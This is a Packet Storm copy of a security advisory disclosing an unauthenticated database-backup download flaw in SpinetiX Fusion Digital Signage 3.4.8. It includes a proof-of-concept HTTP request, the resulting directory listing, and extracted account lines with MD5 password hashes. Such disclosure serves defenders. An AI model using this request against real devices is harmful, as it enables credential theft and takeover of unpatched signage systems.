exploit the possibilities

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure
Posted Oct 1, 2020
Authored by LiquidWorm | Site zeroscience.mk

SpinetiX Fusion Digital Signage version 3.4.8 suffers from a database backup disclosure vulnerability.

tags | exploit
MD5 | bd78c5ac803733307c42b810b4232217

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure

Change Mirror Download

SpinetiX Fusion Digital Signage 3.4.8 Database Backup Disclosure


Vendor: SpinetiX AG
Product web page: https://www.spinetix.com
Affected version: <= 3.4.8 (1.0.36274)

Summary: At SpinetiX we inspire businesses to unlock the potential of their story.
We believe in the power of digital signage as a dynamic new storytelling platform
to engage with people. For more than 13 years, we have been constantly innovating
to deliver cutting-edge digital signage solutions that help our customers shine.
Fusion is a built-in content management application accessible from a standard web
browser - it is pre-installed on every HMP200, HMP130, and HMP100 device, and does
not require any additional license, cost, or software installation.

Desc: The application is vulnerable to unauthenticated database download and information
disclosure vulnerability. This can enable an attacker to disclose sensitive information
resulting in authentication bypass, session hijacking and full system control.

Tested on: Apache 2.2.34
PHP/5.3.18-2
Linux 2.6.10


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2020-5593
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5593.php


03.08.2020

--


Request:
--------

GET /content/files/backups/ HTTP/1.0
Host: 192.168.1.1

Response:
---------

HTTP/1.1 200 OK
Date: Wed, 26 Aug 2020 15:57:40 GMT
Server: Apache/2.2.22 (Unix)
X-spinetix-firmware: 3.0.6-1.0.21932
X-raperca-version: 3.0.6-1.0.21912
X-spinetix-serial: 001d400027b8
X-spinetix-hw: BonsaiT
Content-Length: 636
Connection: close
Content-Type: text/html;charset=UTF-8


Index of /content/files/backups
Name Last modified Size Description
Parent Directory -
Custom1337Name.7z 25-Aug-2020 10:06 1.0M

Extracting the .7z shows userpwd.txt file, cat userpwd.txt:

admin:e10adc3949ba59abbe56e057f20f883e:file,program,activate,layout,playlist,model,slide,edit,admin::0
testingus:b874da212a62786181c66c5bbaabf425:file,program,activate,layout,playlist,model,slide,edit,admin:se:1
Login or Register to add favorites

File Archive:

October 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    25 Files
  • 2
    Oct 2nd
    13 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    1 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    15 Files
  • 7
    Oct 7th
    15 Files
  • 8
    Oct 8th
    11 Files
  • 9
    Oct 9th
    3 Files
  • 10
    Oct 10th
    1 Files
  • 11
    Oct 11th
    1 Files
  • 12
    Oct 12th
    8 Files
  • 13
    Oct 13th
    12 Files
  • 14
    Oct 14th
    23 Files
  • 15
    Oct 15th
    4 Files
  • 16
    Oct 16th
    13 Files
  • 17
    Oct 17th
    1 Files
  • 18
    Oct 18th
    1 Files
  • 19
    Oct 19th
    27 Files
  • 20
    Oct 20th
    41 Files
  • 21
    Oct 21st
    18 Files
  • 22
    Oct 22nd
    10 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close